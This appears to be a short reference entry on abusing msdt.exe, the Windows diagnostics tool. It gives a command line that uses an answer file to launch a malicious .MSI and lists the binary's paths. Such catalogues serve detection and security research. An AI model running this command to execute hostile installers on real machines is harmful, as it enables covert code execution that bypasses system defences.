- Functions: Execute
Open .diagcab package
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Launches the Microsoft Diagnostics Tool, which executes the malicious .MSI referenced in the PCW8E57.xml file.
Resources:
Full path:
- C:\Windows\System32\Msdt.exe
- C:\Windows\SysWOW64\Msdt.exe
Notes: Thanks to: See the Payloads folder for an example PCW8E57.xml file.